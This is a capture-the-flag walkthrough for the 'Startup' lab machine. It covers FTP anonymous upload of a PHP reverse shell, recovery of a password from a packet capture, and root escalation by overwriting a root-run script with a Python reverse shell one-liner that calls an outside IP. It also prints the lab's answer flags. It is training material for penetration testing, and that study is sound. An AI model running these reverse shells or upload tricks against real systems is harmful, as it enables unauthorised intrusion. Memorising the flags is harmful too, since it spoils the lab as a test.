Startup Walkthrough

Startup Machine is a simple machine that teaches you the relation between FTP and HTTP and how you escalate privileges with script running by higher privileged script.

Lets start startup machine by accessing it from here.

As always, let’s start by scanning the machine with nmap to see open ports available

nmap -sV -sC  machine_IP

you should get the following results

so we have the following services

• port 21 for FTP services with anonymous login allowed
• port 22 for SSH service
• port 80 for Apache Service

let’s open the website on the machine and check it if there are information that might be useful.

Sadly, Nothing much on the website other than a coming soon page, also, there are no important information in the page’s source code.

let’s run gobuster to see available directories and pages on the server.

gobuster dir --url http://Machine_IP --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

After Some time , we can see our results, where we have two directories only, “files” and “server-status”.

let’s access “files” directory first.

it contains couple of files, you can check the files, important.jpg is a normal image and notice.txt is a text file, but let’s leave them for now.

If you try to access “server-status” directory, you will get 403 response as we are not authorized to access that page.

Let’s change the direction a bit and try with the FTP service, let’s Login to FTP Server as anonymous since we already saw that we can do that with our nmap results.

we can see that we have the same files as we found earlier, let’s get the image and notice file first.

Notice.txt has the following text

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

let’s conclude that there might be a user called “maya” on the system.

Now let get important.jpg from the server.

It looks like a normal image but let’s try to check the EXIF data of the image ( EXIF data is some metadata about the image )

exiftool important.png

Since we have FTP Access, let’s see if we can upload anything, let’s check the permissions on the directories we have access to

So we have write permissions for “ftp” directory.

since the files in the FTP Server are exposed to the internet and we can access it via Browser, also we already know the server is Apache, then let’s upload a reverse shell that connects back

As always, let’s get our php reverse shell from pentest monkey ( don’t forget to change the proxy and machine IP )

then we upload the file to “ftp” directory by using “put” command

put php-reverse-shell.php

now, let’s open a port on our machine with netcat

nc -lvnp 1234

Then let’s open the file we uploaded in the browser and you should get the shell.

let’s access the home directory, we can see that we have a user called “lennie” but sadly we don’t have permission to access his directory

let’s see what users exist on the system

cat /etc/passwd

So we have root, lennie and ftpsecure. Apparently there are no user called “Maya” so we can ignore that name for now.

let’s try to see if we have access to any directory within the system, and luckily we have access to “recipe.txt” and “incidents”

let’s output the content recipe.txt

cat recipe.txt

and we get our first answer to startup machine

Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

What is the secret spicy soup recipe?

love

let’s go into “incidents” directory, we will find a pcap file which is a file that contains a dump of packets captured on the network

let’s get the file from the server so we can analyze it.

to get the file, we can simply copy it from the current directory to the “files/ftp” directory where we have access to it through FTP and through The browser and because our user is www-data then it has access to the directory inside the web server anyway

cp suspicious.pcapng /var/www/html/files/ftp/

now we can access the file via the browser and download the file.

after we download it, let’s open it with wireshark.

let’s follow TCP streams until we find something interesting ( you can change the stream by increasing the value highlighted below which is number 7 in the image )

let’s go through the commands, we can see that it’s someone is trying to hack the machine where he listed the files, then he did one line python shell

Then we can see he was trying to go inside “lennie” directory but he got the same error we did, then he tried password for www-data user to get the sudo but it wrong password.

and finally he listed the list of users in /etc/passwd and exited the shell.

now the journey is a bit weird, especially that they used the same password 3 times as if they’re trying to login into their account NOT brute forcing the password.

with keeping that in mind, let’s try to login as lennie, but first we need to get a proper shell and of course we can use the one liner the hacker already did.

python -c "import pty;pty.spawn('/bin/bash')"

Now, let’s switch the users with

su lennie

With the password we have above

c4ntg3t3n0ughsp1c3

and Voila! we have the access to lennie

and now we can access lennie directory in home.

and we have 2 directories and our second flag, let’s output user.txt first

What are the contents of user.txt?

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

great, now let’s check “Documents” folder first,

and we have 3 files, that have the following content

concern.txt

I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie

list.txt

Shoppinglist: Cyberpunk 2077 | Milk | Dog food

note.txt

Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs.

Nothing much here , let’s check the second directory.

let’s check the script planner.sh

so the code echo’s a list to the startup_list.txt file then execute /etc/print.sh script.

let’s check that script and what permissions we have for it, and we have writing permission on the file, so that’s perfect.

great!, we have writing permission to that file since we’re the owners too , since the file is executed by “planner.sh” which has root permission then we should be able to escalate our privileges if we do one line shell bash.

let’s try to include our own code to run bash

echo "#\!/bin/bash; bash;" > /etc/print.sh 

now let’s run planner.sh again, we should get an interactive shell.

BUT, sadly we don’t since we are trying to access the file as lennie, it won’t allow me, let’s see if there are a cronjob that runs the file for us since we are not allowed to.

cat /etc/crontab

but there’s nothing, let’s check if we have crontab process running

pstree -apl `pidof cron`

great , we have process with id 1027, let’s check what does that process run

ps -aef --forest -p 1027

but couldn’t find anything neither, i was in doubt that it runs by cronjob until i found a script online that helped

find . -name "planner.sh" -exec '{}' \; -print 2>/dev/null

so, what this does is that it will find a value returned by a script if it was running, all we have to do now is to search for “Done” and we confirmed our suspicious.

so now, let’s edit print.sh to give us a reverse shell with new connection via netcat

cat > /etc/print.sh << EOF 
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.59.163",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF

and voila! we get the root shell

and now we can answer the last part

What are the contents of root.txt?

THM{f963aaa6a430f210222158ae15c3d76d}

and that’s all for startup machine.